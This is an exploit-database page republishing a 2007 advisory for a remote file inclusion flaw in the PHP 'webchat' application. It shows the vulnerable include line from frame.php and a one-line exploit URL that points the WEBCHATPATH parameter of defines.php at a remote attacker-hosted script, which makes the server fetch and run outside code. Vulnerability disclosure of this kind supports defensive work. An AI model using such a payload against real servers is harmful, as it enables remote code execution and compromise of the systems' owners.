header-logo
Suggest Exploit
vendor:
by:
TheViper-hacker
N/A
CVSS
N/A
File Include Vulnerability
CWE
Product Name:
Affected Version From:
Affected Version To:
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2007

webchat

The webchat application is vulnerable to a file include vulnerability. An attacker can exploit this vulnerability by manipulating the WEBCHATPATH parameter in the defines.php file. This can lead to remote code execution or information disclosure.

Mitigation:

To mitigate this vulnerability, it is recommended to update the webchat application to the latest version and apply any available patches.
Source

Exploit-DB raw data:

######################################################################### 
# 
#           [ webchat ] 
# 
# Class:     File Include Vulnerability  
# Published  2007/1/21 
# Remote:    Yes  
# Critical   Level : Dangerous 
# Site:      http://www.easy-script.com/compt.php?id=1705  || http://sourceforge.net/projects/webdev-webchat/
# Author:    TheViper-hacker  
# Contact:   theviper-hacker@hotmail.com 
#   
#########################################################################
file ;
frame.php
======================================================
Vuln Code
include ($WEBCHATPATH.'language/english.php');
=======================================================
Exploit :       
Http:// www.Victem.0 / [ webchat-077_path] /defines.php?WEBCHATPATH=http://turnkringonzehoop.be/viper.txt?
 
 ----  Thanx: [MoHaNdKo] [Cold ThreE] [cold zero] [The Wolf KSA]  ]organza[
 ---- GreeTz: All www.4azhar.Com Members Cont : rida-10@msn.com
--------------------------------------||  Viva ISLAM ||-----------------------------------------

# milw0rm.com [2007-01-21]